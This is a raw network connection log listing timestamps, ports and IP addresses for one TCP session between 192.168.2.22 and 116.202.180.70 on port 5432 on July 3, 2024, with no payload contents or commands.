Jul 3, 2024 02:22:31.716367960 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.716381073 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.716398954 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734263897 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734302998 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734328985 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734339952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734349966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734359026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734369040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734369040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734380007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734388113 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734390974 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734405041 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734427929 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734428883 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734437943 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734447002 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734460115 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734474897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734527111 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734566927 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734637976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734647036 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734683990 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734693050 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734730005 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734817982 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734827042 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734843016 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734850883 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734860897 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734860897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734870911 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734875917 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734885931 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734896898 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734896898 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734905958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734915972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734921932 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734925985 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734936953 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734937906 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734946966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734961033 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734983921 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.734985113 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.734996080 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.735004902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.735028028 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.735040903 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.749919891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.749928951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.749958992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.749969959 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.749998093 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.750025988 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750036001 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750053883 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750061989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750067949 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.750072002 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750088930 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.750102997 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750109911 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.750116110 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750127077 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750140905 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.750161886 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.750180960 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750190973 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750201941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750211000 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.750222921 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.750241995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.752072096 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764112949 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764139891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764149904 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764152050 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764159918 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764164925 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764168978 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764177084 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764184952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764192104 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764194965 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764204025 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764204979 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764214993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764220953 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764224052 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764236927 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764252901 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764260054 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764261007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764271021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764280081 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764290094 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.764301062 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764308929 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.764319897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773158073 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773169041 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773178101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773206949 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773216963 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773225069 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773236036 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773246050 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773262024 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773262024 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773272038 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773276091 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773304939 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773382902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773394108 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773405075 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773420095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773420095 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773428917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773432016 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773441076 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.773449898 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773462057 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.773471117 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.780462027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.780509949 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.780514956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.780525923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.780550003 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.780560970 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.780582905 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.780592918 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.780603886 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.780613899 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.780625105 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.780641079 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.791913033 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.791923046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.791929007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.791980982 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792033911 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792052031 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792061090 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792078972 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792090893 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792155027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792165041 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792176008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792185068 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792187929 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792195082 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792198896 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792215109 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792226076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792268038 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792279005 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792289972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792299032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792305946 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792308092 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792319059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792331934 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792337894 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792340994 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792347908 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792356968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792371988 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792372942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792380095 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792385101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792393923 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792395115 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792403936 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792403936 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792417049 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792429924 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792457104 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792552948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792562008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792568922 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792593002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792601109 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792623043 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792634010 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792646885 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.792658091 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.792675972 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.806896925 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.806950092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.806951046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.806962967 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.806978941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.806988001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.806992054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.806997061 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.807003021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.807012081 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.807014942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.807024956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.807025909 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.807034969 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.807051897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825043917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825097084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825107098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825119972 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825128078 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825128078 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825134993 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825139999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825150013 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825162888 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825165033 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825175047 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825177908 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825184107 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825193882 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825203896 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825208902 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825241089 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825258017 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825268030 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825277090 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825285912 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825306892 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825313091 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825314045 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825323105 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825331926 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825346947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825356007 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825357914 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825367928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825392962 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825428009 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825460911 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825521946 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825539112 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825547934 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825563908 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825573921 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825577974 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825582981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825592995 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825603008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825608015 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825618029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825619936 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825627089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825629950 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825653076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825659037 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825687885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825695992 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.825704098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.825736046 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.840807915 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.840816975 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.840826035 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.840868950 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.840945959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.840955973 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.840965986 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.840976000 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.840981007 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.840986013 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.840993881 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.840996027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.841006041 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.841007948 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.841016054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.841022968 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.841027021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.841029882 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.841036081 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.841047049 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.841047049 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.841056108 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.841058969 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.841073036 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.841088057 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.841705084 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854732990 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854782104 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854789972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854801893 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854803085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854810953 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854816914 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854826927 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854826927 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854835987 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854845047 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854854107 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854856968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854857922 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854871035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854871035 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854882956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854885101 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854892969 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854902983 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854908943 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854908943 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854918003 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854922056 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854928017 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.854933977 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854948044 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854955912 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.854976892 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.863831043 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.863882065 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.863882065 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.863892078 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.863914967 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.863924980 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.863969088 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.863979101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.863990068 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.863998890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.864017010 CEST	49169	5432	192.168.2.22	116.202.180.70
